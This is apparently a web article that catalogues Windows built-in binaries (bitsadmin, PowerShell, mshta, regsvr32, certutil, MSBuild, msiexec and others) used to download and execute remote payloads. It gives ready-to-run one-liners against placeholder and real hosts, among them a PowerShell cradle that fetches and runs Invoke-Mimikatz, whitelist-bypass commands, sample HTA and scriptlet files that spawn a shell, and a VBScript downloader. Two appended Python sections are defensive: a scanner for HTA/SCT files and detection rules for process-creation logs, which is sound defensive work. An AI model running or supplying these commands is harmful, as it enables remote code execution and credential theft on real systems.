Article Abstract: This article presents a systematic compilation of methods for downloading and executing files on Windows systems using various built-in commands, including bitsadmin, PowerShell, mshta, and others. These techniques are applicable to Windows 7 and later versions.
Table of Contents
- 1. bitsadmin Command (Windows 7 and Above)
- 2. PowerShell Command Download and Execution (Windows 7 and Above)
- 3. mshta Command Download and Execution
- 4. rundll32 Command Download and Execution
- 5. regasm Command from .NET Framework
- 6. CMD Remote Command Download
- 7. regsvr32 Command Download and Execution
- 8. certutil Command Download and Execution
- 9. MSBuild Command from .NET Framework
- 10. odbcconf Command Download and Execution
- 11. cscript Script Remote Command Download and Execution
- 12. pubprn.vbs Download and Execution Command
- 13. Native Windows copy Command
- 14. IEXPLORE.EXE Command Download and Execution (Requires IE 0-day)
- 15. IEExec Command Download and Execution
- 16. msiexec Command Download and Execution
- 17. GreatSCT Download and Execution Project
1. bitsadmin Command (Windows 7 and Above)
The bitsadmin utility can only download files to a specified path on the local system.
bitsadmin /transfer myDownLoadJob /download /priority normal "http://img5.cache.netease.com/photo/0001/2013-03-28/8R1BK3QO3R710001.jpg" "d:\abc.jpg"
bitsadmin /transfer d90f http://site.com/a %APPDATA%\d90f.exe&%APPDATA%\d90f.exe&del %APPDATA%\d90f.exe
2. PowerShell Command Download and Execution (Windows 7 and Above)
PowerShell provides powerful capabilities for downloading and executing scripts and binaries directly from remote sources.
powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz
powershell -exec bypass -f \\webdavserver\folder\payload.ps1
powershell (new-object System.Net.WebClient).DownloadFile( 'http://192.168.168.183/1.exe','C:\1111111111111.exe')
powershell -w hidden -c (new-object System.Net.WebClient).Downloadfile('http://img5.cache.netease.com/photo/0001/2013-03-28/8R1BK3QO3R710001.jpg','d:\\1.jpg')
3. mshta Command Download and Execution
The mshta command executes HTML Application (HTA) files, which can contain VBScript or JScript that performs download and execution.
mshta vbscript:Close(Execute("GetObject(""script:http://webserver/payload.sct"")"))
mshta http://webserver/payload.hta
mshta \\webdavserver\folder\payload.hta
Sample payload.hta:
<HTML>
<HEAD>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<script language="VBScript">
Window.ReSizeTo 0, 0
Window.moveTo -2000,-2000
Set objShell = CreateObject("Wscript.Shell")
objShell.Run "calc.exe"
self.close
</script>
</HEAD>
<body>
demo
</body>
</HTML>
4. rundll32 Command Download and Execution
The rundll32 utility can execute functions exported from DLLs, including those hosted on remote WebDAV shares.
rundll32 \\webdavserver\folder\payload.dll,entrypoint
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";o=GetObject("script:http://webserver/payload.sct");window.close();
Reference: https://github.com/3gstudent/Javascript-Backdoor
5. regasm Command from .NET Framework
The regasm.exe tool, part of the .NET Framework, can be used to execute managed DLLs from remote locations.
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /u \\webdavserver\folder\payload.dll
6. CMD Remote Command Download
The Windows Command Prompt can directly read and execute commands from a remote batch file.
cmd.exe /k < \\webdavserver\folder\batchfile.txt
7. regsvr32 Command Download and Execution
The regsvr32 utility can register and execute COM objects from remote scriptlet files.
regsvr32 /u /n /s /i:http://webserver/payload.sct scrobj.dll
regsvr32 /u /n /s /i:\\webdavserver\folder\payload.sct scrobj.dll
regsvr32 /u /s /i:http://site.com/js.png scrobj.dll
Sample js.png (Scriptlet):
<?XML version="1.0"?>
<scriptlet>
<registration
progid="ShortJSRAT"
classid="{10001111-0000-0000-0000-0000FEEDACDC}" >
<!-- Learn from Casey Smith @subTee -->
<script language="JScript">
<![CDATA[
ps = "cmd.exe /c calc.exe";
new ActiveXObject("WScript.Shell").Run(ps,0,true);
]]>
</script>
</registration>
</scriptlet>
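The two samples above (payload.hta and the js.png scriptlet) share the same shape: a script engine declaration paired with a WScript.Shell object that runs a command, plus, in the HTA case, window calls that push the application off-screen. The following Python scanner, added here as an example and not part of the original article, checks file content for exactly that pairing, so a mail gateway or file-share scanner can flag such HTA/SCT files before they reach mshta or regsvr32. The indicator regexes are this example's own assumptions derived from the page's samples; the first two inputs are the page's samples, the third is a constructed benign HTA.

```python
import re
from typing import List, Tuple

# Indicators that a .hta or .sct file carries a script that spawns a shell.
# The patterns are this example's own assumptions, written against the two
# samples shown on this page; they are not a vendor signature set.
INDICATORS: List[Tuple[str, re.Pattern]] = [
    ("script block",
     re.compile(r"<script\b[^>]*language\s*=\s*[\"']?(vbscript|jscript|javascript)", re.I)),
    ("scriptlet registration",
     re.compile(r"<registration\b[^>]*(progid|classid)\s*=", re.I)),
    ("shell object created",
     re.compile(r"(CreateObject|ActiveXObject)\s*\(\s*[\"']WScript\.Shell[\"']", re.I)),
    ("shell .Run call",
     re.compile(r"\.Run\b", re.I)),
    ("remote scriptlet fetch",
     re.compile(r"GetObject\s*\(\s*[\"']+script:", re.I)),
    ("window hidden off-screen",
     re.compile(r"Window\.(ReSizeTo|MoveTo)\s+-?\d+\s*,\s*-?\d+", re.I)),
]


def scan_script_container(text: str) -> List[str]:
    """Return the label of every indicator present in an HTA/SCT body."""
    return [label for label, rx in INDICATORS if rx.search(text)]


def is_suspicious(text: str) -> bool:
    """A script engine declaration alone is normal for an HTA; flag only when
    it is paired with shell creation, a .Run call, or a remote scriptlet fetch."""
    found = set(scan_script_container(text))
    has_engine = bool(found & {"script block", "scriptlet registration"})
    has_action = bool(found & {"shell object created", "shell .Run call",
                               "remote scriptlet fetch"})
    return has_engine and has_action


# Sample inputs. The first two are the payload.hta and js.png scriptlet
# bodies shown on this page; the third is a constructed benign HTA.
HTA_SAMPLE = """<HTML>
<HEAD>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<script language="VBScript">
Window.ReSizeTo 0, 0
Window.moveTo -2000,-2000
Set objShell = CreateObject("Wscript.Shell")
objShell.Run "calc.exe"
self.close
</script>
</HEAD>
<body>demo</body>
</HTML>"""

SCT_SAMPLE = """<?XML version="1.0"?>
<scriptlet>
<registration progid="ShortJSRAT" classid="{10001111-0000-0000-0000-0000FEEDACDC}" >
<script language="JScript">
<![CDATA[
ps = "cmd.exe /c calc.exe";
new ActiveXObject("WScript.Shell").Run(ps,0,true);
]]>
</script>
</registration>
</scriptlet>"""

BENIGN_HTA = """<HTML>
<HEAD><title>Status board</title>
<script language="JScript">
document.title = "Status board - " + new Date().toDateString();
</script></HEAD>
<body>All systems nominal</body>
</HTML>"""

if __name__ == "__main__":
    for name, body in (("payload.hta", HTA_SAMPLE), ("js.png", SCT_SAMPLE),
                       ("status.hta", BENIGN_HTA)):
        verdict = "SUSPICIOUS" if is_suspicious(body) else "ok"
        print(f"{name:12s} {verdict:10s} {scan_script_container(body)}")
```

The pairing rule matters: plenty of legitimate HTAs declare a script engine, so the engine indicator alone would drown analysts in false positives, whereas engine plus WScript.Shell (or a `GetObject("script:...")` fetch, as in the mshta one-liner above) is rare outside offensive tooling. Content inspection also covers the case where the file arrives by a path the command-line detection never sees, such as a WebDAV share mounted by the victim.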
8. certutil Command Download and Execution
The certutil utility, primarily used for certificate management, can also download files and decode Base64-encoded content.
certutil -urlcache -split -f http://webserver/payload payload
certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.dll & C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil /logfile= /LogToConsole=false /u payload.dll
certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.exe & payload.exe
certutil -urlcache -split -f http://site.com/a a.exe && a.exe && del a.exe && certutil -urlcache -split -f http://192.168.254.102:80/a delete
9. MSBuild Command from .NET Framework
The MSBuild tool, part of the .NET Framework, can execute tasks defined in XML project files, enabling remote code execution.
cmd /V /c "set MB="C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe" & !MB! /noautoresponse /preprocess \\webdavserver\folder\payload.xml > payload.xml & !MB! payload.xml"
10. odbcconf Command Download and Execution
The odbcconf utility can be used to register DLLs remotely via its regsvr command.
odbcconf /s /a {regsvr \\webdavserver\folder\payload_dll.txt}
11. cscript Script Remote Command Download and Execution
The cscript command executes VBScript or JScript scripts, which can be hosted remotely.
cscript //E:jscript \\webdavserver\folder\payload.txt
Sample downfile.vbs:
' Set your settings
strFileURL = "http://www.it1.net/images/it1_logo2.jpg"
strHDLocation = "c:\logo.jpg"
' Fetch the file
Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")
objXMLHTTP.open "GET", strFileURL, false
objXMLHTTP.send()
If objXMLHTTP.Status = 200 Then
Set objADOStream = CreateObject("ADODB.Stream")
objADOStream.Open
objADOStream.Type = 1 'adTypeBinary
objADOStream.Write objXMLHTTP.ResponseBody
objADOStream.Position = 0 'Set the stream position to the start
Set objFSO = Createobject("Scripting.FileSystemObject")
If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation
Set objFSO = Nothing
objADOStream.SaveToFile strHDLocation
objADOStream.Close
Set objADOStream = Nothing
End if
Set objXMLHTTP = Nothing
Execution Command:
cscript downfile.vbs
12. pubprn.vbs Download and Execution Command
The pubprn.vbs script, part of Windows printing administration, can execute remote scriptlet files.
cscript /b C:\Windows\System32\Printing_Admin_Scripts\zh-CN\pubprn.vbs 127.0.0.1 script:https://gist.githubusercontent.com/enigma0x3/64adf8ba99d4485c478b67e03ae6b04a/raw/a006a47e4075785016a62f7e5170ef36f5247cdb/test.sct
13. Native Windows copy Command
The built-in copy and xcopy commands can copy files from remote SMB shares.
copy \\x.x.x.x\xx\poc.exe
xcopy d:\test.exe \\x.x.x.x\test.exe
14. IEXPLORE.EXE Command Download and Execution (Requires IE 0-day)
Internet Explorer can be launched from the command line to access a remote URL, potentially triggering a vulnerability.
"C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://site.com/exp
15. IEExec Command Download and Execution
IEExec.exe, part of the .NET Framework, can execute managed code from remote locations.
C:\Windows\Microsoft.NET\Framework\v2.0.50727> caspol -s off
C:\Windows\Microsoft.NET\Framework\v2.0.50727> IEExec http://site.com/files/test64.exe
Reference: https://room362.com/post/2014/2014-01-16-application-whitelist-bypass-using-ieexec-dot-exe/
16. msiexec Command Download and Execution
The msiexec installer can execute MSI packages hosted on remote servers.
msiexec /q /i http://site.com/payloads/calc.png
17. GreatSCT Download and Execution Project
GreatSCT is a project that provides various techniques for bypassing application whitelisting and executing payloads.
Reference: https://github.com/GreatSCT
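Every technique catalogued in sections 1 to 16 leaves the same footprint: a signed, built-in binary started with a command line that names a remote source (an http:// URL or a \\server UNC path) or a decode step. That makes process-creation telemetry (Sysmon Event ID 1, Windows Security 4688 with command-line auditing enabled) the natural place to detect them. The Python below is an added example, not code from the original article: a small rule set matched against constructed process-creation events whose command lines follow the shapes shown on this page, together with benign look-alikes that use the same binaries. The rule labels, regexes and sample events are this example's own assumptions; the host names use the reserved example.invalid domain.

```python
import re
from typing import Dict, List, Tuple

# One rule per download-and-execute pattern catalogued on this page.
# Each entry is (technique label, regex applied to the full command line).
# These regexes are this example's own assumptions; tune them per environment.
RULES: List[Tuple[str, re.Pattern]] = [
    ("bitsadmin transfer",
     re.compile(r"\bbitsadmin(\.exe)?\b.*/transfer\b.*(https?:|\\\\)", re.I)),
    ("certutil urlcache download",
     re.compile(r"\bcertutil(\.exe)?\b.*-urlcache\b.*https?:", re.I)),
    ("certutil base64 decode",
     re.compile(r"\bcertutil(\.exe)?\b.*-decode\b", re.I)),
    ("powershell download cradle",
     re.compile(r"\bpowershell(\.exe)?\b.*(DownloadString|DownloadFile|Invoke-WebRequest|\bIEX\b|Invoke-Expression)", re.I)),
    ("powershell remote script file",
     re.compile(r"\bpowershell(\.exe)?\b.*\s-f(ile)?\s+\\\\", re.I)),
    ("mshta remote/inline script",
     re.compile(r"\bmshta(\.exe)?\b.*(https?:|\\\\|vbscript:|javascript:)", re.I)),
    ("regsvr32 scriptlet",
     re.compile(r"\bregsvr32(\.exe)?\b.*(/i:(https?:|\\\\)|scrobj\.dll)", re.I)),
    ("rundll32 remote dll or javascript",
     re.compile(r"\brundll32(\.exe)?\b.*(\\\\[^\s,]+\.dll|javascript:)", re.I)),
    ("regasm/installutil uninstall trick",
     re.compile(r"\b(regasm|installutil)(\.exe)?\b.*/u\b", re.I)),
    ("msbuild remote project",
     re.compile(r"\bmsbuild(\.exe)?\b.*\\\\", re.I)),
    ("odbcconf regsvr",
     re.compile(r"\bodbcconf(\.exe)?\b.*regsvr", re.I)),
    ("cscript/wscript remote script",
     re.compile(r"\b[cw]script(\.exe)?\b.*(\\\\|script:|https?:)", re.I)),
    ("msiexec remote package",
     re.compile(r"\bmsiexec(\.exe)?\b.*/i\s+https?:", re.I)),
    ("ieexec remote url",
     re.compile(r"\bieexec(\.exe)?\b.*https?:", re.I)),
]


def classify(command_line: str) -> List[str]:
    """Return the label of every rule that fires on one command line."""
    return [label for label, rx in RULES if rx.search(command_line)]


def scan_events(events: List[Dict[str, str]]) -> List[Tuple[str, List[str]]]:
    """Run process-creation events through the rules; keep only the hits."""
    hits = []
    for ev in events:
        labels = classify(ev.get("CommandLine", ""))
        if labels:
            hits.append((ev["CommandLine"], labels))
    return hits


# Constructed process-creation events (Image + CommandLine, as Sysmon ID 1
# would record them). The first eight follow command shapes from this page;
# the last four are benign uses of the same binaries.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"Image": r"C:\Windows\System32\bitsadmin.exe",
     "CommandLine": r"bitsadmin /transfer job1 /download /priority normal http://example.invalid/a.jpg d:\a.jpg"},
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil -urlcache -split -f http://example.invalid/payload.b64 payload.b64"},
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil -decode payload.b64 payload.exe"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell -w hidden -c (new-object System.Net.WebClient).DownloadFile('http://example.invalid/1.jpg','d:\1.jpg')"},
    {"Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r"mshta http://example.invalid/payload.hta"},
    {"Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r"regsvr32 /u /n /s /i:http://example.invalid/payload.sct scrobj.dll"},
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32 \\webdavserver\folder\payload.dll,entrypoint"},
    {"Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r"msiexec /q /i http://example.invalid/payloads/calc.png"},
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil -dump C:\certs\corp-root.cer"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell -c Get-Process | Sort-Object CPU"},
    {"Image": r"C:\Windows\System32\bitsadmin.exe",
     "CommandLine": r"bitsadmin /list /allusers"},
    {"Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r"regsvr32 /s C:\Program Files\Vendor\vendorctl.dll"},
]

if __name__ == "__main__":
    for cmd, labels in scan_events(SAMPLE_EVENTS):
        print(f"[{', '.join(labels)}] {cmd}")
```

Two gaps are worth knowing before relying on these rules. The `cmd.exe /k < \\webdavserver\folder\batchfile.txt` form from section 6 is not caught by a command-line rule because the redirection is consumed by the parent shell and never appears in the child's command line; the signal there is the parent's command line or the SMB/WebDAV access itself. Likewise `cscript downfile.vbs` from section 11 looks harmless on the command line because the download logic lives inside the script, so that case needs file-content inspection (or network telemetry for the MSXML2.XMLHTTP request). In both cases, pair command-line matching with parent-process context and outbound-connection events rather than treating any single rule as complete.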